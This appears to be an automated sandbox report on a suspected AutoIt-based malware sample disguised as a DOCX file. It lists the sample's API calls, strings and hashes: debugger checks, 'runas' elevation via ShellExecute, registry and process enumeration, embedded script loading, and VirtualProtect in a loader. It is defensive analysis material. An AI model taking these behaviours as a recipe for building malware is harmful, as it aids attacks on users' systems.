Instruction Fuzzy Hash: F8212C31E0DA464FE395AA285851178B6C2EF4937079402BED00DCB2D3DF1DBC4597D1

Function 00007FF7C02433B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1338251671.00007FF7C0240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7c0240000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: b59cfae338d122b582f3448533001b7876ddd0559532c6f5f6b6dbf3c5e56f9d
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 5201677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3651DB36E882CB45

Analysis Process: ._cache_DOCX.exePID: 6108, Parent PID: 9212COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	29

Executed Functions

Function 0069374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0069376D

Part of subcall function 00694257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_DOCX.exe,00000104,?,00000000,00000001,00000000), ref: 0069428C

IsDebuggerPresent.KERNEL32(?,?), ref: 0069377F
GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_DOCX.exe,00000104,?,00751120,C:\Users\user\Desktop\._cache_DOCX.exe,00751124,?,?), ref: 006937EE

Part of subcall function 006934F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0069352A

SetCurrentDirectoryW.KERNEL32(?), ref: 00693860
MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00742934,00000010), ref: 007021C5
SetCurrentDirectoryW.KERNEL32(?,?), ref: 007021FD
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00702232
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0072DAA4), ref: 00702290
ShellExecuteW.SHELL32(00000000), ref: 00702297

Part of subcall function 006930A5: GetSysColorBrush.USER32(0000000F), ref: 006930B0
Part of subcall function 006930A5: LoadCursorW.USER32(00000000,00007F00), ref: 006930BF
Part of subcall function 006930A5: LoadIconW.USER32(00000063), ref: 006930D5
Part of subcall function 006930A5: LoadIconW.USER32(000000A4), ref: 006930E7
Part of subcall function 006930A5: LoadIconW.USER32(000000A2), ref: 006930F9
Part of subcall function 006930A5: RegisterClassExW.USER32(?), ref: 00693167

Part of subcall function 00692E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00692ECB
Part of subcall function 00692E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00692EEC
Part of subcall function 00692E9D: ShowWindow.USER32(00000000), ref: 00692F00
Part of subcall function 00692E9D: ShowWindow.USER32(00000000), ref: 00692F09

Part of subcall function 00693598: _memset.LIBCMT ref: 006935BE
Part of subcall function 00693598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00693667

Strings

C:\Users\user\Desktop\._cache_DOCX.exe, xrefs: 006937B4, 006937E9, 006937FD, 00702257
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 007021BE
"u, xrefs: 0069379D
runas, xrefs: 0070228B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: C:\Users\user\Desktop\._cache_DOCX.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"u
API String ID: 4253510256-2687722818
Opcode ID: 8351f73f3cda13eb70cc6085834043ebc8337195c4b8c00255ed4831390df7d9
Instruction ID: 1801808c23399cf593bb7394fa693c92f8c6a46f913c958afb4631219891482d
Opcode Fuzzy Hash: 8351f73f3cda13eb70cc6085834043ebc8337195c4b8c00255ed4831390df7d9
Instruction Fuzzy Hash: 04515B74644358FBCF10ABA0DC46FFD377EAB05712F408099F651926D2D6B84E46CB29

Function 006F30AD Relevance: 16.9, APIs: 11, Instructions: 397
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006F3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006F2AA6,?,?), ref: 006F3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006F317F

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 006F321E
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006F32B6
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 006F34F5
RegCloseKey.ADVAPI32(00000000), ref: 006F3502

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: adbbeed2ff2a5674c7298f71d0e79a78d7d4dbe3cfaffffe101fc4fafcf26b58
Instruction ID: 8866da8f4e4cf8a9d8e3c129e55129ebc47630328a22f2a81590c246ad52f29e
Opcode Fuzzy Hash: adbbeed2ff2a5674c7298f71d0e79a78d7d4dbe3cfaffffe101fc4fafcf26b58
Instruction Fuzzy Hash: 6FE17D71204215AFCB14DF28C891D6ABBEAEF89724F04856DF54ADB3A1DB30EE01CB55

Function 006929C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00692A33
KillTimer.USER32(?,00000001), ref: 00692A5D
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00692A80
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00692A8B
CreatePopupMenu.USER32 ref: 00692A9F
PostQuitMessage.USER32(00000000), ref: 00692AAE

Strings

TaskbarCreated, xrefs: 00692A86

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: 161970d11eca3abfa889f3557cd846f80e116167871a960944e4c2d7d804b859
Instruction ID: e513117726e86cd51140bdf639ac7b378bb2d82bda6d07928130050faae1e976
Opcode Fuzzy Hash: 161970d11eca3abfa889f3557cd846f80e116167871a960944e4c2d7d804b859
Instruction Fuzzy Hash: B1412B33500247BBDF34AF689C29BF9365FF714342F448229F906969D1DAAC9C428769

Function 006AE47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 006AE4A7

Part of subcall function 00697E53: _memmove.LIBCMT ref: 00697EB9

GetCurrentProcess.KERNEL32(00000000,0072DC28,?,?), ref: 006AE567
GetNativeSystemInfo.KERNEL32(?,0072DC28,?,?), ref: 006AE5BC
FreeLibrary.KERNEL32(00000000,?,?), ref: 006AE5C7
FreeLibrary.KERNEL32(00000000,?,?), ref: 006AE5DA
GetSystemInfo.KERNEL32(?,0072DC28,?,?), ref: 006AE5E4
GetSystemInfo.KERNEL32(?,0072DC28,?,?), ref: 006AE5F0

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
String ID:
API String ID: 2717633055-0
Opcode ID: 928b5ae3604394ea8f680faa932fa6758ccd2c4fd6fdb802d15a98c27362f85c
Instruction ID: 7a770e80dcaaf1b6ef9a758cb27c69e071b4454dcb7793b1ec62cc6e6d973f70
Opcode Fuzzy Hash: 928b5ae3604394ea8f680faa932fa6758ccd2c4fd6fdb802d15a98c27362f85c
Instruction Fuzzy Hash: 1261F3B2C09284CFCF15DF68A4C11E97FA66F2A304F1985D9D8449B247D62ACD09CF66

Function 006931F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00693202
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00693219
LoadResource.KERNEL32(?,00000000), ref: 007057D7
SizeofResource.KERNEL32(?,00000000), ref: 007057EC
LockResource.KERNEL32(?), ref: 007057FF

Strings

SCRIPT, xrefs: 0069320F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 5abd79132d5941ee8c59d68e53c54ff6fb9a765fb98d62130970c2149b326743
Instruction ID: 7146e2ad741a6f77bea8cb8977ac4a3fec41168e74d64bcbd980b0fe444f2c08
Opcode Fuzzy Hash: 5abd79132d5941ee8c59d68e53c54ff6fb9a765fb98d62130970c2149b326743
Instruction Fuzzy Hash: 91115A70200711BFEB258B69ED48FA77BBEEBC9B41F108128F41286690DA71DE01CA61

Function 006D6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006D6F7D
Process32FirstW.KERNEL32(00000000,0000022C), ref: 006D6F8D
Process32NextW.KERNEL32(00000000,0000022C), ref: 006D6FAC
__wsplitpath.LIBCMT ref: 006D6FD0
_wcscat.LIBCMT ref: 006D6FE3
CloseHandle.KERNEL32(00000000,?,00000000), ref: 006D7022

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 1eb28593a2881c7b493f214afd7496cb9fa12a987c5f956b6822987513e9d16b
Instruction ID: d5a41057ce50ea5a6131a45a9ce3ccc039378f05f0e88be3f738b3103fd7ad06
Opcode Fuzzy Hash: 1eb28593a2881c7b493f214afd7496cb9fa12a987c5f956b6822987513e9d16b
Instruction Fuzzy Hash: E02198B1904218BBDB21AB94CC88BEEB7BDAB09304F10449AF505E7281E7759F84DF65

Function 007F80C0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 007F81FA
GetProcAddress.KERNEL32(?,007F1FF9), ref: 007F8218
ExitProcess.KERNEL32(?,007F1FF9), ref: 007F8229
VirtualProtect.KERNEL32(00690000,00001000,00000004,?,00000000), ref: 007F8277
VirtualProtect.KERNEL32(00690000,00001000), ref: 007F828C

Memory Dump Source

Source File: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: 5710e5a5ca61d327d8e84db4a25e7541cd44e84da52624ab55a429d471f409ce
Instruction ID: 3d6c9e3bce72ccea68ae2aa3a40d3fae4052f8b7b982ef2400e81c7fcf5057ca
Opcode Fuzzy Hash: 5710e5a5ca61d327d8e84db4a25e7541cd44e84da52624ab55a429d471f409ce
Instruction Fuzzy Hash: A7510772A4461E4BD7609BB8DCC0671B7A4EB52320728073CC7E1C73C6EFA8580B8362

Function 006DEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 006D78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 006D78CB

CoInitialize.OLE32(00000000), ref: 006DF04D
CoCreateInstance.COMBASE(0071DA7C,00000000,00000001,0071D8EC,?), ref: 006DF066
CoUninitialize.COMBASE ref: 006DF083

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

Strings

.lnk, xrefs: 006DF02B, 006DF03D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 97d0a00143d1e361073778af1721407ad051bcff1214c1f194902fe8ed53a93a
Instruction ID: 9cb453d14670e55e15d61c49178104179f25a0ee94381fbec740c6cada3822d2
Opcode Fuzzy Hash: 97d0a00143d1e361073778af1721407ad051bcff1214c1f194902fe8ed53a93a
Instruction Fuzzy Hash: 9EA13675A043019FCB10DF54C884D5ABBEABF89720F14899DF89A9B3A1CB31ED45CB91

Function 0069DCD0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 540COMMON

Download Yara Rule

Strings

G-i, xrefs: 0069DD94, 0069DF2B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID: G-i
API String ID: 0-2664481092
Opcode ID: 03babf876480575943cc26753c97d6f6474e3f1480c98f663d0881f4712d644a
Instruction ID: 11364228cef9bdbfd40219b3456a30af6d23214a3c9513aae80a162ea58098bf
Opcode Fuzzy Hash: 03babf876480575943cc26753c97d6f6474e3f1480c98f663d0881f4712d644a
Instruction Fuzzy Hash: 4722CEB4A00206CFDF24DF58C481ABAB7F6FF18300F148169E8869B791E775AD85CB91

Function 006ADD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(0069C848,0069C848), ref: 006ADDA2
FindFirstFileW.KERNEL32(0069C848,?), ref: 00704A83

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: File$AttributesFindFirst
String ID:
API String ID: 4185537391-0
Opcode ID: 3e592350297c814f6436befbe2ca2791a1d489367470bf780174488ac6106380
Instruction ID: 646befd1769d3fc56d32907e0c6bd8d3f40250b82a118621c4b01d7cb9b55961
Opcode Fuzzy Hash: 3e592350297c814f6436befbe2ca2791a1d489367470bf780174488ac6106380
Instruction Fuzzy Hash: 9CE0D871414415B7C324773CDC0D8E9379C9E06338B108709F936C10E0E7789D459EDA

Function 006A3680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 79e678afda55a4b6c7f2a6e941a321a9c46c40e90123fe969aa373a04c7a9af0
Instruction ID: 85812da27087d99b01c11f3c6e593e50dd81d2eedf93981eb8fca0a1782f6acb
Opcode Fuzzy Hash: 79e678afda55a4b6c7f2a6e941a321a9c46c40e90123fe969aa373a04c7a9af0
Instruction Fuzzy Hash: F09246706083419FD764EF18C480B6ABBE2BF8A304F14895DF98A8B392D775ED45CB52

Function 0070C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0070C158

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: df4da96f55b83e56cfc299040a56b2a343b5edee85195b36cc0b863422dd6dc0
Instruction ID: d0ff4859b7b444ce9609cf15725e3f4752802fe384394ad3ddc607f6cf2f5d84
Opcode Fuzzy Hash: df4da96f55b83e56cfc299040a56b2a343b5edee85195b36cc0b863422dd6dc0
Instruction Fuzzy Hash: EDC04CB140400DDFC715CB84C945DEFB7BCBB08300F108195A115E1040D7749B459F75

Function 0069E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0069E279
timeGetTime.WINMM ref: 0069E51A
TranslateMessage.USER32(?), ref: 0069E646
DispatchMessageW.USER32(?), ref: 0069E651
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0069E664
LockWindowUpdate.USER32(00000000), ref: 0069E697
DestroyWindow.USER32 ref: 0069E6A3
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0069E6BD
Sleep.KERNEL32(0000000A), ref: 00705B15
TranslateMessage.USER32(?), ref: 007062AF
DispatchMessageW.USER32(?), ref: 007062BD
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007062D1

Strings

@GUI_WINHANDLE, xrefs: 00705C05
@GUI_CTRLID, xrefs: 00705BB9
@GUI_CTRLHANDLE, xrefs: 00705C51
@TRAY_ID, xrefs: 00705D6E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: cb6daff08e11ecdfdfc3d713533ac00719688c9bea822ff65336e89ae9429826
Instruction ID: c8af97ca16a63f7a9b08e81f27e6d6e85e373ec090880d265d9464b2359e1704
Opcode Fuzzy Hash: cb6daff08e11ecdfdfc3d713533ac00719688c9bea822ff65336e89ae9429826
Instruction Fuzzy Hash: 6B62D170504340DFDB20DF24C895BAA77EABF45304F04896DF94A8B6D2DBBAE844CB56

Function 006C6A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 006C6C73
___createFile.LIBCMT ref: 006C6CB4
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 006C6CDD
